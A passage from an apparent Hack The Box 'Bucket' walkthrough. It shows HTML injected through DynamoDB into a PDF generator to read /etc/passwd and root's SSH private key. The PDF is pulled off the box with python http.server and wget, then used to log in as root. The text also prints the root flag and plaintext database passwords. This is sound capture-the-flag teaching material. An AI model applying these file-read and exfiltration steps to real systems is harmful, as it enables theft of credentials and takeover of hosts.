?>

The file index.php in this folder matched what curl had delivered to me, but contained some additional PHP code. This seemed similar to the file I had seen in the project folder, with a DynamoDB client being created after a POST request with the action get_alerts. It then scans the table called alerts for items whose title is exactly Ransomware. For each match it picks a random number between 1 and 10000, uses that as the filename of an HTML file in /var/www/bucket-app/files/, and writes the item’s data field into it. Finally, the Java program Pd4Cmd converts the HTML file into a PDF named result.pdf in the same folder.
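One detail worth pinning down is that the FilterExpression in index.php is title = :title, an equality test rather than a substring match. The Python sketch below mimics that selection on items in DynamoDB's typed-attribute format. It is a simplified stand-in for the PHP logic, not a reimplementation of it, and the function name select_alerts and the sample items are hypothetical.

```python
def select_alerts(items: list, title: str = "Ransomware") -> list:
    """Return the data payloads of items whose title equals the given value."""
    return [
        item["data"]["S"]
        for item in items
        if item.get("title", {}).get("S") == title and "data" in item
    ]


# Hypothetical table contents used only to exercise the filter.
table = [
    {"title": {"S": "Ransomware"}, "data": {"S": "<html>first</html>"}},
    {"title": {"S": "Ransomware attack"}, "data": {"S": "<html>ignored</html>"}},
    {"title": {"S": "Phishing"}, "data": {"S": "<html>ignored too</html>"}},
]
print(select_alerts(table))
```

An item therefore needs the exact title Ransomware, plus a data attribute holding the HTML, before the application will write it out and convert it.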

I double checked again to be sure, but there didn’t seem to be an alerts table in the database. This seemed like a good opportunity to make one!

- https://docs.aws.amazon.com/cli/latest/userguide/cli-services-dynamodb.html

I found a page in the AWS documentation that specified how to create a DynamoDB table.

aws dynamodb create-table \

--table-name alerts \

--attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S \

--key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE \

--provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=10 --endpoint-url http://s3.bucket.htb

I used the AWS CLI to create the table called alerts using the information from the documentation and got back a response.

{

"TableDescription": {

"AttributeDefinitions": [

{

"AttributeName": "title",

"AttributeType": "S"

},

{

"AttributeName": "data",

"AttributeType": "S"

}

],

"TableName": "alerts",

"KeySchema": [

{

"AttributeName": "title",

"KeyType": "HASH"

},

{

"AttributeName": "data",

"KeyType": "RANGE"

}

],

"TableStatus": "ACTIVE",

"CreationDateTime": 1615775665.193,

"ProvisionedThroughput": {

"LastIncreaseDateTime": 0.0,

"LastDecreaseDateTime": 0.0,

"NumberOfDecreasesToday": 0,

"ReadCapacityUnits": 10,

"WriteCapacityUnits": 10

},

"TableSizeBytes": 0,

"ItemCount": 0,

"TableArn": "arn:aws:dynamodb:us-east-1:000000000000:table/alerts"

}

}

It looked like I had successfully created the table.

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ aws dynamodb put-item \

--table-name alerts \

--item '{

"title": {"S": "Ransomware"},

"data": {"S": "<html><head></head><body><img src='/etc/passwd'></img></body></html>"}

}' \

--return-consumed-capacity TOTAL --endpoint-url http://s3.bucket.htb

Next I created the item in the database that matched what the PHP script was looking for. I set the title attribute to be Ransomware. For the data field I had to make sure that it contained HTML code. As a test I made it load /etc/passwd to make sure it worked.
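Because the table is wiped regularly, it helps to generate the --item argument instead of retyping it. The following Python sketch builds the same JSON document as the command above for an arbitrary file path and HTML tag. The function name build_alert_item and its parameters are illustrative assumptions, not part of the AWS CLI.

```python
import json


def build_alert_item(path: str, tag: str = "img") -> str:
    """Return the JSON for a put-item call whose HTML references a local file."""
    html = "<html><head></head><body><{0} src='{1}'></{0}></body></html>".format(tag, path)
    item = {
        "title": {"S": "Ransomware"},  # must match the filter in index.php exactly
        "data": {"S": html},
    }
    return json.dumps(item)


print(build_alert_item("/etc/passwd"))
```

The printed string can be passed to aws dynamodb put-item through the --item option, wrapped in single quotes in the shell.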

{

"ConsumedCapacity": {

"TableName": "alerts",

"CapacityUnits": 1.0

}

}

After inserting my data into the table I got back a reply that simply said that I had consumed 1.0 “CapacityUnits”.

roy@bucket:/var/www/bucket-app/files$ curl --data "action=get_alerts" http://localhost:8000/

I used curl to connect to the endpoint to trigger the PHP script to pull the data from the database and make the PDF file in /var/www/bucket-app/files/.

roy@bucket:/var/www/bucket-app/files$ python3 -m http.server 8090

Serving HTTP on 0.0.0.0 port 8090 (http://0.0.0.0:8090/) ...

10.10.14.158 - - [15/Mar/2021 02:49:49] "GET /result.pdf HTTP/1.1" 200 -

I used Python to host an HTTP server to serve the PDF file externally.

┌──(zweilos㉿kali)-[~]

└─$ wget http://10.10.10.212:8090/result.pdf

--2021-03-14 22:40:00-- http://10.10.10.212:8090/result.pdf

Connecting to 10.10.10.212:8090... connected.

HTTP request sent, awaiting response... 200 OK

Length: 1400 (1.4K) [application/pdf]

Saving to: ‘result.pdf’

result.pdf 100%[====================================>] 1.37K --.-KB/s in 0s

2021-03-14 22:40:00 (26.2 MB/s) - ‘result.pdf’ saved [1400/1400]

Using wget on my machine, I was able to download the PDF file. This whole cycle had to be repeated many times because the files folder and the database table were cleared frequently.
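Because the item has to be re-inserted every time the table is wiped, the put-item step can be wrapped in a pair of small functions. This is a rough sketch rather than what I actually ran: `build_alert_item` and `put_alert` are hypothetical names, and the table has to be recreated first with the create-table command from earlier. One detail worth noting is that in the command above the inner single quotes around the path are consumed by the shell, so the value actually stored is `src=/etc/passwd` without quotes. The helper reproduces that same value.

```bash
#!/bin/bash
# Hypothetical helpers; only the aws CLI options and the endpoint come from the write-up.

# build_alert_item TAG PATH: print the item JSON for an HTML tag and a local file path.
# Paths containing quotes, backslashes, or spaces are not handled by this sketch.
build_alert_item() {
    local tag="$1"
    local path="$2"
    printf '{"title": {"S": "Ransomware"}, "data": {"S": "<html><head></head><body><%s src=%s></%s></body></html>"}}' \
        "$tag" "$path" "$tag"
}

# put_alert TAG PATH: insert the item into the alerts table on the target endpoint.
put_alert() {
    aws dynamodb put-item \
        --table-name alerts \
        --item "$(build_alert_item "$1" "$2")" \
        --return-consumed-capacity TOTAL \
        --endpoint-url http://s3.bucket.htb
}
```

With this in place, `put_alert img /etc/passwd` repeats the test above, and only the tag and path arguments need to change to request a different file.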



After getting the correct file I opened it and found that it did indeed contain the contents of /etc/passwd.

Getting root’s SSH key

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ aws dynamodb put-item \

--table-name alerts \

--item '{

"title": {"S": "Ransomware"},

"data": {"S": "<html><head></head><body><iframe src='/root/.ssh/id_rsa'></iframe></body></html>"}

}' \

--return-consumed-capacity TOTAL --endpoint-url http://s3.bucket.htb



I again added an item to the database, this time trying to see if I could get root’s SSH private key.

{

"ConsumedCapacity": {

"TableName": "alerts",

"CapacityUnits": 1.0

}

}

I got back the same result message about consuming units. I went through the same steps as with the /etc/passwd PDF using curl, Python, and wget to create, host, and exfiltrate the file back to my machine.

After opening the PDF file, I found that I now had root’s private SSH key. I copied the contents to a blank file and named it root.key.

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ ssh root@10.10.10.212 -i root.key

The authenticity of host '10.10.10.212 (10.10.10.212)' can't be established.

ECDSA key fingerprint is SHA256:7+5qUqmyILv7QKrQXPArj5uYqJwwe7mpUbzD/7cl44E.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added '10.10.10.212' (ECDSA) to the list of known hosts.

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

@ WARNING: UNPROTECTED PRIVATE KEY FILE! @

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Permissions 0644 for 'root.key' are too open.

It is required that your private key files are NOT accessible by others.

This private key will be ignored.

Load key "root.key": bad permissions

root@10.10.10.212's password:

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ chmod 600 root.key
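The warning above appears because the pasted key file was created with the default 0644 permissions, so ssh ignored it and fell back to a password prompt. One way to avoid that round trip is to create the file with tight permissions from the start. The function name `save_private_key` below is hypothetical, and this is just a sketch of the idea.

```bash
#!/bin/bash
# Hypothetical helper: write stdin to FILE so that only the owner can read or write it.
save_private_key() {
    local file="$1"
    # The restrictive umask applies only inside the subshell; chmod also covers
    # the case where the file already existed with looser permissions.
    ( umask 077 && cat > "$file" ) && chmod 600 "$file"
}
```

For example, running `save_private_key root.key`, pasting the key, and pressing Ctrl-D leaves a file that ssh will accept with `-i root.key`.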

Root.txt

┌──(zweilos㉿kali)-[~/htb/bucket]

└─$ ssh root@10.10.10.212 -i root.key

Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-48-generic x86_64)

* Documentation: https://help.ubuntu.com

* Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage

System information as of Mon 15 Mar 2021 03:09:12 AM UTC

System load: 0.01

Usage of /: 33.6% of 17.59GB

Memory usage: 28%

Swap usage: 0%

Processes: 261

Users logged in: 0

IPv4 address for br-bee97070fb20: 172.18.0.1

IPv4 address for docker0: 172.17.0.1

IPv4 address for ens160: 10.10.10.212

IPv6 address for ens160: dead:beef::250:56ff:feb9:654c

* Kubernetes 1.19 is out! Get it in one command with:

sudo snap install microk8s --channel=1.19 --classic

https://microk8s.io/ has docs and details.

229 updates can be installed immediately.

103 of these updates are security updates.

To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.

To check for new updates run: sudo apt update

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Feb 9 14:39:03 2021

root@bucket:~# id && hostname

uid=0(root) gid=0(root) groups=0(root)

bucket

root@bucket:~# ls -la

total 76

drwx------ 11 root root 4096 Sep 24 04:09 .

drwxr-xr-x 21 root root 4096 Feb 10 12:49 ..

drwxr-xr-x 2 root root 4096 Sep 23 03:19 .aws

drwxr-xr-x 3 root root 4096 Sep 16 12:47 backups

lrwxrwxrwx 1 root root 9 Sep 4 2020 .bash_history -> /dev/null

-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc

drwx------ 3 root root 4096 Sep 23 04:35 .cache

drwxr-xr-x 3 root root 4096 Sep 21 12:46 .config

-rw-r--r-- 1 root root 217 Sep 24 02:18 docker-compose.yml

drwxr-xr-x 7 root root 4096 Mar 15 03:10 files

drwxr-xr-x 3 root root 4096 Sep 21 12:36 .java

drwxr-xr-x 3 root root 4096 Sep 24 02:21 .local

-rw-r--r-- 1 root root 161 Dec 5 2019 .profile

-rwxr-xr-x 1 root root 1694 Sep 24 04:09 restore.php

-rwxr-xr-x 1 root root 381 Sep 24 02:33 restore.sh

-r-------- 1 root root 33 Mar 15 00:51 root.txt

drwxr-xr-x 3 root root 4096 May 18 2020 snap

drwx------ 2 root root 4096 Sep 21 11:44 .ssh

-rwxr-xr-x 1 root root 340 Sep 24 02:40 start.sh

-rwxr-xr-x 1 root root 182 Sep 24 02:08 sync.sh

After fixing the key's permissions and connecting over SSH, I was logged in as root. In the /root directory I saw a few automation scripts that were probably the cause of all the redundant work earlier…

root@bucket:~# cat root.txt

57aa1314cfc55966d346fab64d381711

First, I collected my proof.

root@bucket:~# cat start.sh

#!/bin/bash

cd /root && docker-compose up -d

sleep 20

aws --endpoint-url=http://localhost:4566 s3 mb s3://adserver

aws --endpoint-url=http://localhost:4566 s3 sync /root/backups s3://adserver

sleep 20

aws --endpoint-url=http://localhost:4566 s3 mb s3://adserver

aws --endpoint-url=http://localhost:4566 s3 sync /root/backups s3://adserver

root@bucket:~# cat restore.sh

#!/bin/bash

sleep 60

aws --endpoint-url=http://localhost:4566 s3 rm s3://adserver --recursive

aws --endpoint-url=http://localhost:4566 s3 rb s3://adserver

aws --endpoint-url=http://localhost:4566 s3 mb s3://adserver

aws --endpoint-url=http://localhost:4566 s3 sync /root/backups/ s3://adserver

rm -rf /var/www/html/*

cp -R /root/backups/index.html /var/www/html/

/root/restore.php

root@bucket:~# cat sync.sh

#!/bin/bash

rm -rf /root/files/*

aws --endpoint-url=http://localhost:4566 s3 sync s3://adserver/ /root/files/ --exclude "*.png" --exclude "*.jpg"

cp -R /root/files/* /var/www/html/

After looking through the scripts, I saw that I was correct. These scripts were set up to clear files and keep things running smoothly on the machine since it was most likely being exploited by multiple users at the same time.

root@bucket:~# cat restore.php

#!/usr/bin/php

<?php

require '/var/www/bucket-app/vendor/autoload.php';

date_default_timezone_set('America/New_York');

use Aws\DynamoDb\DynamoDbClient;

use Aws\DynamoDb\Exception\DynamoDbException;

$client = new Aws\Sdk([

'profile' => 'default',

'region' => 'us-east-1',

'version' => 'latest',

'endpoint' => 'http://localhost:4566'

]);

$dynamodb = $client->createDynamoDb();

$params = [

'TableName' => 'alerts'

];

$tableName='users';

try {

$response = $dynamodb->createTable([

'TableName' => $tableName,

'AttributeDefinitions' => [

[

'AttributeName' => 'username',

'AttributeType' => 'S'

],

[

'AttributeName' => 'password',

'AttributeType' => 'S'

]

],

'KeySchema' => [

[

'AttributeName' => 'username',

'KeyType' => 'HASH'

],

[

'AttributeName' => 'password',

'KeyType' => 'RANGE'

]

],

'ProvisionedThroughput' => [

'ReadCapacityUnits' => 5,

'WriteCapacityUnits' => 5

]

]);

$response = $dynamodb->putItem(array(

'TableName' => $tableName,

'Item' => array(

'username' => array('S' => 'Cloudadm'),

'password' => array('S' => 'Welcome123!')

)

));

$response = $dynamodb->putItem(array(

'TableName' => $tableName,

'Item' => array(

'username' => array('S' => 'Mgmt'),

'password' => array('S' => 'Management@#1@#')

)

));

$response = $dynamodb->putItem(array(

'TableName' => $tableName,

'Item' => array(

'username' => array('S' => 'Sysadm'),

'password' => array('S' => 'n2vM-<_K_Q:.Aa2')

)

));}

catch(Exception $e) {

echo 'Message: ' .$e->getMessage();

}

$result = $dynamodb->deleteTable($params);

This PHP file automated the creation and setup of the users table, populating it with the juicy credentials I had found earlier. Its last line also deleted the alerts table, which explains why the table I created kept disappearing.

Thanks to MrR3boot for exploring this topic of cloud enumeration and attack. This is a difficult topic to cover with Hack the Box, since each machine needs to be self-contained, but this instance was a great way to learn about the AWS CLI and how to use it to enumerate S3 buckets.

If you have comments, issues, or other feedback, or have any other fun or useful tips or tricks to share, feel free to contact me on Github at https://github.com/zweilosec or in the comments below!

If you like this content and would like to see more, please consider buying me a coffee!